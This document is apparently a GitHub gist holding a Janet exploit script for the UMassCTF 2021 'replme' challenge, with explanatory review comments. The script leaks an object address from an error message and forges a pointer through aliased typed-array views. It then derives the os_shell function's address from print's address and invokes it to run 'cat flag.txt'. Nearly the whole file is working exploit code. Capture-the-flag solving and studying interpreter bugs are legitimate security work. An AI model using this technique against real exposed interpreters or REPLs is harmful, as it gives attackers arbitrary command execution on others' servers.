@rick2600
Created March 30, 2021 01:29
UMassCTF 2021 - replme
# CTF: UMassCTF 21
# Challenge: replme
# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085
# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip
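# Parse a string of hexadecimal digits into a number.
#
# Digits are consumed from the least significant end (the reversed string);
# each digit contributes `digit << (4 * position)` to the result.
# Accepts 0-9, A-F and a-f (the original only handled upper case).
# An empty string yields 0.
# NOTE(review): `blshift` is an integer shift, so digits landing in the
# top bits of a wide input may wrap — confirm before reusing outside this script.
(defn hex2n [x]
  (var res 0)
  (var shift 0)
  (each ch (reverse x)
    # Map the ASCII code of one hex digit to its numeric value.
    (def digit
      (cond
        (>= ch 97) (+ (- ch 97) 10)   # a-f
        (>= ch 65) (+ (- ch 65) 10)   # A-F
        (- ch 48)))                   # 0-9
    (+= res (blshift digit shift))
    (+= shift 4))
  res)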
# Call `param` with no arguments and harvest the address embedded in the
# resulting error message.
#
# The author relies on the error text carrying the object's address at a
# fixed offset: characters 7..21 are printed, and the hex digits at 9..13
# and 13..21 are parsed into the :hi and :lo keys of the returned table.
# If `param` does not raise, the returned table is empty.
(defn leak [param]
  (def result @{})
  (try
    (param)
    ([err]
      (def shown (string/slice err 7 21))
      (print "Leaked array address: " shown)
      (put result :hi (hex2n (string/slice err 9 13)))
      (put result :lo (hex2n (string/slice err 13 21)))))
  result)
# Review note: the surface abused below is the typed-array API accepting an
# arbitrary runtime value as a backing store (see the tarray/new call with a
# float64 value as its last argument). A REPL exposed to untrusted users
# should not offer constructors that alias raw memory like this.
# A one-element array; calling it with no arguments raises, and `leak`
# pulls the address out of that error message.
(var array @[print])
(var leaked (leak array))
# An 8-byte buffer with two views over the same bytes: one float64 element
# and two uint32 elements. Writing through the uint32 view and reading
# through the float64 view reinterprets the bytes as a different value.
(var buffer (tarray/buffer 8))
(var buffer_float64_view (tarray/new :float64 1 1 0 buffer))
(var buffer_uint32_view (tarray/new :uint32 2 1 0 buffer))
# Upper word: 0xffff0000 plus the leaked high bits; lower word: leaked low
# bits plus 0x18. NOTE(review): the 0xffff0000 prefix is presumably a tag in
# the runtime's value encoding and 0x18 an offset into the array object —
# confirm against the Janet build shipped in janet.zip.
(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi)))
(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18))
# used to leak print (cfun_io_print) address
# The crafted float64 value, not a buffer, is passed as the backing store of
# this uint32 view; elements 0 and 1 of it are read back below.
(var fake_buffer_uint32_view (tarray/new :uint32 10 1 0 (buffer_float64_view 0)))
# cfun_io_print + 0x3fd0 = &os_shell
# Rewrite the shared buffer with the values read through the fake view,
# adding 0x3fd0 to the low word (the author's stated offset).
(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1))
(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0))
# Invoke the crafted float64 value as a function with a string argument.
((buffer_float64_view 0) "cat flag.txt")